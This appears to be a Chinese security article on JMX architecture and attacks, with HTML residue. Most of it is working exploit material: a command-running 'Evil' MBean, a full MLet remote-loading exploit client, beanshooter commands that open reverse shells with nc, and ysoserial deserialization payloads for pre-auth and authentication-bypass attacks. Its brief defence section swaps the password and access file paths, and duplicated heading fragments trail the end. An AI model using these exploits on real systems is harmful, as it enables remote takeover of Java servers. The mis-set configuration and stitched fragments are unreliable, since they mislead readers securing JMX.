JMX安全攻防研究分析<\/h1>

一、JMX基本介绍<\/h2>

JMX(Java Management Extensions, Java管理扩展)是一个为应用程序、设备、系统等植入管理功能的框架，具有以下特点：<\/p>

跨越异构操作系统平台、系统体系结构和网络传输协议<\/li>
灵活开发无缝集成的系统、网络和服务管理应用<\/li>
可理解为服务器，允许客户端远程访问运行在服务器上的Java程序的API<\/li>

运维常用工具(Zabbix、Cacti、Nagios)通过JMX监控Tomcat、Weblogic等服务器<\/li> <\/ul>

二、JMX架构分析<\/h2>
JMX架构分为三层：<\/p>

1. 基础层：MBean(被管理的资源)<\/h3>

MBean类型：<\/p>

Standard MBean<\/strong>：最简单的类型，管理资源必须定义在接口中，命名规范为<MBean名称>MBean<\/code><\/li>
Dynamic MBean<\/strong>：必须实现javax.management.DynamicMBean<\/code>接口，属性方法在运行时定义<\/li>
Open MBean<\/strong>：规范尚不完善<\/li>

Model MBean<\/strong>：使用javax.management.modelmbean.RequiredModelMBean<\/code>，管理资源在外部类中<\/li> <\/ul> 2. 适配层：MBeanServer<\/h3> 提供对资源的注册和管理功能<\/p> 3. 接入层：Connector<\/h3> 提供远程访问的入口<\/p> 三、JMX简易示例<\/h2> 1. 本地MBean实现<\/h3> 文件结构<\/strong>：<\/p> HelloWorld.java HelloWorldMBean.java jmxDemo.java <\/code><\/pre> 代码实现<\/strong>：<\/p> HelloWorldMBean.java<\/code>:<\/p> package<\/span> com.jmx;<\/span> <\/span><\/span>public<\/span> interface<\/span> HelloWorldMBean<\/span> {<\/span> <\/span><\/span> public<\/span> void<\/span> sayhello<\/span>();<\/span> <\/span><\/span> public<\/span> int<\/span> add<\/span>(<\/span>int<\/span> x,<\/span> int<\/span> y);<\/span> <\/span><\/span> public<\/span> String getName<\/span>();<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>HelloWorld.java<\/code>:<\/p> package<\/span> com.jmx;<\/span> <\/span><\/span>public<\/span> class<\/span> HelloWorld<\/span> implements<\/span> HelloWorldMBean {<\/span> <\/span><\/span> private<\/span> String name =<\/span> "Al1ex"<\/span>;<\/span> <\/span><\/span> @Override<\/span> public<\/span> void<\/span> sayhello<\/span>()<\/span> {<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"hello world "<\/span> +<\/span> this<\/span>.<\/span>name<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> @Override<\/span> public<\/span> int<\/span> add<\/span>(<\/span>int<\/span> x,<\/span> int<\/span> y)<\/span> {<\/span> <\/span><\/span> return<\/span> x +<\/span> y;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> @Override<\/span> public<\/span> String getName<\/span>()<\/span> {<\/span> <\/span><\/span> return<\/span> this<\/span>.<\/span>name<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>jmxDemo.java<\/code>:<\/p> package<\/span> com.jmx;<\/span> <\/span><\/span>import<\/span> java.lang.management.ManagementFactory;<\/span> <\/span><\/span>import<\/span> javax.management.MBeanServer;<\/span> <\/span><\/span>import<\/span> javax.management.ObjectName;<\/span> <\/span><\/span>import<\/span> java.rmi.registry.LocateRegistry;<\/span> <\/span><\/span>import<\/span> java.rmi.registry.Registry;<\/span> <\/span><\/span>import<\/span> javax.management.remote.JMXServiceURL;<\/span> <\/span><\/span>import<\/span> javax.management.remote.JMXConnectorServer;<\/span> <\/span><\/span>import<\/span> javax.management.remote.JMXConnectorServerFactory;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> jmxDemo<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> MBeanServer mbs =<\/span> ManagementFactory.<\/span>getPlatformMBeanServer<\/span>();<\/span> <\/span><\/span> ObjectName mbsname =<\/span> new<\/span> ObjectName(<\/span>"test:type=HelloWorld"<\/span>);<\/span> <\/span><\/span> HelloWorld mbean =<\/span> new<\/span> HelloWorld();<\/span> <\/span><\/span> mbs.<\/span>registerMBean<\/span>(<\/span>mbean,<\/span> mbsname);<\/span> <\/span><\/span> <\/span><\/span> Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>1099<\/span>);<\/span> <\/span><\/span> JMXServiceURL jmxServiceURL =<\/span> new<\/span> JMXServiceURL(<\/span> <\/span><\/span> "service:jmx:rmi:\/\/\/jndi\/rmi:\/\/localhost:1099\/jmxrmi"<\/span>);<\/span> <\/span><\/span> JMXConnectorServer jmxConnectorServer =<\/span> JMXConnectorServerFactory <\/span><\/span> .<\/span>newJMXConnectorServer<\/span>(<\/span>jmxServiceURL,<\/span> null<\/span>,<\/span> mbs);<\/span> <\/span><\/span> jmxConnectorServer.<\/span>start<\/span>();<\/span> <\/span><\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"JMXConnectorServer is ready..."<\/span>);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"press any key to exit."<\/span>);<\/span> <\/span><\/span> System.<\/span>in<\/span>.<\/span>read<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2. 远程MBean实现<\/h3> 攻击原理<\/strong>： JMX提供MLet<\/code>对象，其getMBeansFromURL<\/code>方法可加载远程MBean，导致远程代码执行漏洞<\/p> 攻击步骤<\/strong>：<\/p> 编写恶意MBean接口EvilMBean.java<\/code>:<\/li> <\/ol> public<\/span> interface<\/span> EvilMBean<\/span> {<\/span> <\/span><\/span> public<\/span> String runCommand<\/span>(<\/span>String cmd);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> 实现恶意MBeanEvil.java<\/code>:<\/li> <\/ol> import<\/span> java.io.*;<\/span> <\/span><\/span>public<\/span> class<\/span> Evil<\/span> implements<\/span> EvilMBean {<\/span> <\/span><\/span> @Override<\/span> public<\/span> String runCommand<\/span>(<\/span>String cmd)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Runtime rt =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span> <\/span><\/span> Process proc =<\/span> rt.<\/span>exec<\/span>(<\/span>cmd);<\/span> <\/span><\/span> BufferedReader stdInput =<\/span> new<\/span> BufferedReader(<\/span> <\/span><\/span> new<\/span> InputStreamReader(<\/span>proc.<\/span>getInputStream<\/span>()));<\/span> <\/span><\/span> BufferedReader stdError =<\/span> new<\/span> BufferedReader(<\/span> <\/span><\/span> new<\/span> InputStreamReader(<\/span>proc.<\/span>getErrorStream<\/span>()));<\/span> <\/span><\/span> String stdout_err_data =<\/span> ""<\/span>;<\/span> <\/span><\/span> String s;<\/span> <\/span><\/span> while<\/span> ((<\/span>s =<\/span> stdInput.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> stdout_err_data +=<\/span> s +<\/span> "\n"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> while<\/span> ((<\/span>s =<\/span> stdError.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> stdout_err_data +=<\/span> s +<\/span> "\n"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> proc.<\/span>waitFor<\/span>();<\/span> <\/span><\/span> return<\/span> stdout_err_data;<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> return<\/span> e.<\/span>toString<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> 编译并打包为JAR:<\/li> <\/ol> javac Evil.java EvilMBean.java <\/span><\/span>jar -cvf JMXPayload.jar Evil.class EvilMBean.class <\/span><\/span><\/code><\/pre> 创建mlet文件:<\/li> <\/ol> <HTML<\/span>><mlet<\/span> code<\/span>=<\/span>"Evil"<\/span> archive<\/span>=<\/span>"JMXPayload.jar"<\/span> <\/span><\/span>name<\/span>=<\/span>"MLetCompromise1:name=Evil,id=10"<\/span> <\/span><\/span>codebase<\/span>=<\/span>"http:\/\/127.0.0.1:4141"<\/span>><\/mlet<\/span>><\/HTML<\/span>> <\/span><\/span><\/code><\/pre> 启动Web服务器托管文件:<\/li> <\/ol> python2 -m SimpleHTTPServer 4141<\/span> <\/span><\/span><\/code><\/pre> 启动JMXServer:<\/li> <\/ol> import<\/span> javax.management.MBeanServer;<\/span> <\/span><\/span>import<\/span> javax.management.remote.JMXConnectorServer;<\/span> <\/span><\/span>import<\/span> javax.management.remote.JMXConnectorServerFactory;<\/span> <\/span><\/span>import<\/span> javax.management.remote.JMXServiceURL;<\/span> <\/span><\/span>import<\/span> java.io.IOException;<\/span> <\/span><\/span>import<\/span> java.lang.management.ManagementFactory;<\/span> <\/span><\/span>import<\/span> java.net.MalformedURLException;<\/span> <\/span><\/span>import<\/span> java.rmi.registry.LocateRegistry;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> JMXServer<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> MBeanServer mbs =<\/span> ManagementFactory.<\/span>getPlatformMBeanServer<\/span>();<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>9999<\/span>);<\/span> <\/span><\/span> JMXServiceURL url =<\/span> new<\/span> JMXServiceURL(<\/span> <\/span><\/span> "service:jmx:rmi:\/\/\/jndi\/rmi:\/\/127.0.0.1:9999\/jmxrmi"<\/span>);<\/span> <\/span><\/span> JMXConnectorServer cs =<\/span> JMXConnectorServerFactory <\/span><\/span> .<\/span>newJMXConnectorServer<\/span>(<\/span>url,<\/span> null<\/span>,<\/span> mbs);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>".begin rmi start....."<\/span>);<\/span> <\/span><\/span> cs.<\/span>start<\/span>();<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>".rmi start....."<\/span>);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>MalformedURLException e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> 构建ExploitJMXByRemoteMBean攻击:<\/li> <\/ol> package<\/span> JMX_Remote;<\/span> <\/span><\/span>import<\/span> javax.management.MBeanServerConnection;<\/span> <\/span><\/span>import<\/span> javax.management.ObjectInstance;<\/span> <\/span><\/span>import<\/span> javax.management.ObjectName;<\/span> <\/span><\/span>import<\/span> javax.management.remote.JMXConnector;<\/span> <\/span><\/span>import<\/span> javax.management.remote.JMXConnectorFactory;<\/span> <\/span><\/span>import<\/span> javax.management.remote.JMXServiceURL;<\/span> <\/span><\/span>import<\/span> java.net.InetAddress;<\/span> <\/span><\/span>import<\/span> java.net.MalformedURLException;<\/span> <\/span><\/span>import<\/span> java.util.HashSet;<\/span> <\/span><\/span>import<\/span> java.util.Iterator;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> ExploitJMXByRemoteMBean<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> connectAndOwn(<\/span>"localhost"<\/span>,<\/span> "9999"<\/span>,<\/span> "hostname"<\/span>);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> e.<\/span>printStackTrace<\/span>();<\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> static<\/span> void<\/span> connectAndOwn<\/span>(<\/span>String serverName,<\/span> String port,<\/span> String command)<\/span> <\/span><\/span> throws<\/span> MalformedURLException {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> \/\/ 1. 通过RMI创建JMX连接 <\/span><\/span><\/span><\/span> JMXServiceURL u =<\/span> new<\/span> JMXServiceURL(<\/span> <\/span><\/span> "service:jmx:rmi:\/\/\/jndi\/rmi:\/\/"<\/span> +<\/span> serverName +<\/span> <\/span><\/span> ":"<\/span> +<\/span> port +<\/span> "\/jmxrmi"<\/span>);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"URL: "<\/span> +<\/span> u +<\/span> ", connecting"<\/span>);<\/span> <\/span><\/span> JMXConnector c =<\/span> JMXConnectorFactory.<\/span>connect<\/span>(<\/span>u);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Connected: "<\/span> +<\/span> c.<\/span>getConnectionId<\/span>());<\/span> <\/span><\/span> MBeanServerConnection m =<\/span> c.<\/span>getMBeanServerConnection<\/span>();<\/span> <\/span><\/span> <\/span><\/span> \/\/ 2. 加载特殊MBean:javax.management.loading.MLet <\/span><\/span><\/span><\/span> ObjectInstance evil_bean =<\/span> null<\/span>;<\/span> <\/span><\/span> ObjectInstance evil =<\/span> null<\/span>;<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> evil =<\/span> m.<\/span>createMBean<\/span>(<\/span>"javax.management.loading.MLet"<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>javax.<\/span>management<\/span>.<\/span>InstanceAlreadyExistsException<\/span> e)<\/span> {<\/span> <\/span><\/span> evil =<\/span> m.<\/span>getObjectInstance<\/span>(<\/span>new<\/span> ObjectName(<\/span>"DefaultDomain:type=MLet"<\/span>));<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> \/\/ 3. 通过MLet加载远程恶意MBean <\/span><\/span><\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Loaded "<\/span> +<\/span> evil.<\/span>getClassName<\/span>());<\/span> <\/span><\/span> Object res =<\/span> m.<\/span>invoke<\/span>(<\/span>evil.<\/span>getObjectName<\/span>(),<\/span> "getMBeansFromURL"<\/span>,<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>String.<\/span>format<\/span>(<\/span>"http:\/\/%s:4141\/mlet"<\/span>,<\/span> <\/span><\/span> InetAddress.<\/span>getLocalHost<\/span>().<\/span>getHostAddress<\/span>())},<\/span> <\/span><\/span> new<\/span> String[]{<\/span>String.<\/span>class<\/span>.<\/span>getName<\/span>()});<\/span> <\/span><\/span> <\/span><\/span> HashSet res_set =<\/span> ((<\/span>HashSet)<\/span> res);<\/span> <\/span><\/span> Iterator itr =<\/span> res_set.<\/span>iterator<\/span>();<\/span> <\/span><\/span> Object nextObject =<\/span> itr.<\/span>next<\/span>();<\/span> <\/span><\/span> if<\/span> (<\/span>nextObject instanceof<\/span> Exception)<\/span> {<\/span> <\/span><\/span> throw<\/span> ((<\/span>Exception)<\/span> nextObject);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> evil_bean =<\/span> ((<\/span>ObjectInstance)<\/span> nextObject);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 4. 执行恶意MBean <\/span><\/span><\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Loaded class: "<\/span> +<\/span> evil_bean.<\/span>getClassName<\/span>()<\/span> +<\/span> <\/span><\/span> " object "<\/span> +<\/span> evil_bean.<\/span>getObjectName<\/span>());<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Calling runCommand with: "<\/span> +<\/span> command);<\/span> <\/span><\/span> Object result =<\/span> m.<\/span>invoke<\/span>(<\/span>evil_bean.<\/span>getObjectName<\/span>(),<\/span> "runCommand"<\/span>,<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>command},<\/span> new<\/span> String[]{<\/span>String.<\/span>class<\/span>.<\/span>getName<\/span>()});<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Result: "<\/span> +<\/span> result);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> e.<\/span>printStackTrace<\/span>();<\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>四、JMX攻击利用方式<\/h2> 1. 自定义类攻击<\/h3> 使用工具(如beanshooter)向JMX服务端注册恶意MBean:<\/p> 编译并打包恶意MBean为JAR<\/li> 启动HTTP服务托管JAR文件<\/li> 使用beanshooter部署JAR:<\/li> <\/ol> java -jar beanshooter.jar deploy 10.1.200.1 9999<\/span> Evil com.al1ex:type=<\/span>Example --jar-file JMXPayload.jar --stager-url http:\/\/10.1.200.1:4141 <\/span><\/span><\/code><\/pre>2. 命令执行<\/h3> 使用mlet加载tonka MBeans:<\/li> <\/ol> java -jar beanshooter.jar mlet load 172.17.0.2 9010<\/span> tonka http:\/\/172.17.0.1:8000 <\/span><\/span><\/code><\/pre> 借助tonka执行命令:<\/li> <\/ol> java -jar beanshooter.jar tonka exec 172.17.0.2 9010<\/span> id <\/span><\/span><\/code><\/pre> 清理恶意MBean:<\/li> <\/ol> java -jar beanshooter.jar undeploy 172.17.0.2 9010<\/span> MLetTonkaBean:name=<\/span>TonkaBean,id=<\/span>1<\/span> <\/span><\/span><\/code><\/pre>3. 反弹Shell<\/h3> 使用standard模块操作:<\/p> java -jar beanshooter.jar standard 172.17.0.2 9010<\/span> exec 'nc 172.17.0.1 4444 -e ash'<\/span> <\/span><\/span><\/code><\/pre>4. 认证模式攻击<\/h3> 开启监听:<\/li> <\/ol> nc -lnvp 1234<\/span> <\/span><\/span><\/code><\/pre> 发起反序列化请求:<\/li> <\/ol> java -jar beanshooter.jar serial 172.17.0.2 1090<\/span> CommonsCollections6 "nc 172.17.0.1 1234 -e ash"<\/span> --username admin --password admin <\/span><\/span><\/code><\/pre>5. 预认证攻击<\/h3> JMX服务易受预认证反序列化攻击(RMI-JRMP实现):<\/p> java -jar beanshooter.jar serial 172.17.0.2 1090<\/span> CommonsCollections6 "nc 172.17.0.1 4444 -e ash"<\/span> --preauth <\/span><\/span><\/code><\/pre>6. 认证绕过攻击<\/h3> 利用原理：调用接受String参数的MBean方法，将String参数替换为gadget<\/p> 使用ysoserial:<\/p> java -cp ysoserial.jar ysoserial.exploit.JMXInvokeMBean 127.0.0.1 9999<\/span> CommonsBeanutils1 calc.exe <\/span><\/span><\/code><\/pre>代码实现:<\/p> package<\/span> JMX_Remote;<\/span> <\/span><\/span>import<\/span> javax.management.MBeanServerConnection;<\/span> <\/span><\/span>import<\/span> javax.management.ObjectName;<\/span> <\/span><\/span>import<\/span> javax.management.remote.*;<\/span> <\/span><\/span>import<\/span> ysoserial.payloads.ObjectPayload.Utils;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> jmxInvoke<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> JMXServiceURL url =<\/span> new<\/span> JMXServiceURL(<\/span> <\/span><\/span> "service:jmx:rmi:\/\/\/jndi\/rmi:\/\/192.168.174.153:9999\/jmxrmi"<\/span>);<\/span> <\/span><\/span> JMXConnector jmxConnector =<\/span> JMXConnectorFactory.<\/span>connect<\/span>(<\/span>url);<\/span> <\/span><\/span> MBeanServerConnection mbeanServerConnection =<\/span> jmxConnector.<\/span>getMBeanServerConnection<\/span>();<\/span> <\/span><\/span> ObjectName mbeanName =<\/span> new<\/span> ObjectName(<\/span>"java.util.logging:type=Logging"<\/span>);<\/span> <\/span><\/span> Object payloadobject =<\/span> Utils.<\/span>makePayloadObject<\/span>(<\/span>"Jdk7u21"<\/span>,<\/span> "calc.exe"<\/span>);<\/span> <\/span><\/span> mbeanServerConnection.<\/span>invoke<\/span>(<\/span>mbeanName,<\/span> "getLoggerLevel"<\/span>,<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>payloadobject},<\/span> <\/span><\/span> new<\/span> String[]{<\/span>String.<\/span>class<\/span>.<\/span>getCanonicalName<\/span>()});<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>五、防御措施<\/h2> 业务安全考虑<\/strong>：<\/p> 如不需要JMX服务，直接关闭<\/li> 如需开启，必须启用认证并妥善保管认证信息<\/li> <\/ul> <\/li> 认证配置<\/strong>：<\/p> 创建jmxremote.access<\/code>文件定义用户权限: monitorRole readonly controlRole readwrite <\/code><\/pre> <\/li> 创建jmxremote.password<\/code>文件定义用户密码: monitorRole password123 controlRole password456 <\/code><\/pre> <\/li> 配置JMX Agent使用上述文件: -Dcom.sun.management.jmxremote.port=<\/span>9999<\/span> <\/span><\/span>-Dcom.sun.management.jmxremote.authenticate=<\/span>true <\/span><\/span>-Dcom.sun.management.jmxremote.ssl=<\/span>false <\/span><\/span>-Dcom.sun.management.jmxremote.password.file=<\/span>jmxremote.access <\/span><\/span>-Dcom.sun.management.jmxremote.access.file=<\/span>jmxremote.password <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 六、JMX安全问题总结<\/h2> JMX未授权访问<\/strong>：<\/p> 未做身份认证导致服务对外暴露<\/li> 攻击者可通过Jconsole远程连接并调用方法<\/li> <\/ul> <\/li> JMX Mlet远程加载导致命令执行<\/strong>：<\/p> 通过Mlet远程加载恶意MBean<\/li> 通过Jconsole或客户端调用执行命令<\/li> <\/ul> <\/li> JMX RMI攻击导致命令执行<\/strong>：<\/p> JMX基于RMI构建<\/li> 使用Ysoserial攻击RMI Server获取权限<\/li> <\/ul> <\/li> JMX授权绕过导致命令执行<\/strong>：<\/p> 数据传输时的序列化\/反序列化机制漏洞<\/li> 构造恶意序列化数据在服务端执行<\/li> <\/ul> <\/li> <\/ol>

JMX安全攻防研究分析<\/h1>

二、JMX架构分析<\/h2> JMX架构分为三层：<\/p>

2. 适配层：MBeanServer<\/h3> 提供对资源的注册和管理功能<\/p>

3. 接入层：Connector<\/h3> 提供远程访问的入口<\/p>

三、JMX简易示例<\/h2>

四、JMX攻击利用方式<\/h2>

二、JMX架构分析<\/h2>
JMX架构分为三层：<\/p>

2. 适配层：MBeanServer<\/h3>
提供对资源的注册和管理功能<\/p>

3. 接入层：Connector<\/h3>
提供远程访问的入口<\/p>